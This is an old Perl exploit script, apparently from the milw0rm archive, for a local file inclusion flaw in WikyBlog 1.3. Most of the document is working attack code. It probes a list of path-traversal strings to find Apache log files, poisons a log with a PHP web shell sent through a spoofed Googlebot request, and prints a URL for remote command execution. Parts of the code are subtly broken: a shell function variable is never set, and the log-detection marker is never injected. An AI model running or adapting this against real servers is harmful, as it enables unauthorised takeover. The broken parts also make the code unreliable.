#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
# Software: WikyBlog 1.3 #
# #
# Vendor: http://www.wikyblog.com/ #
# #
# Released: 2006/12/01 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for WikyBlog administrator #
# testing purposes only! #
# #
# This exploit makes use of a local file inclusion exploit in #
# WikyBlog to allow command execution. Firstly it locates an #
# access_log, or error_log then it inserts a PHP Shell into #
# the log file and returns a link for command execution. #
# #
# include/WBmap.php?l=file_to_include%00 #
# register_globals being on does not affect this vulnerability #
#################################################################################################
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$folder = @ARGV[1]; # /wikyblog/
sub Header()
{
print q {#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
};
}
sub Usage()
{
print q {Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
};
exit();
}
Header();
if (!$target || !$folder) {
Usage(); }
# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
#locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
$out = "";
while ($answer = <$sock>) {
$out.=$answer; }
close($sock);
if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
print "[+] Log file found! [".$path."] \n";
$log = $path; }
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";
print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";
# milw0rm.com [2006-12-01]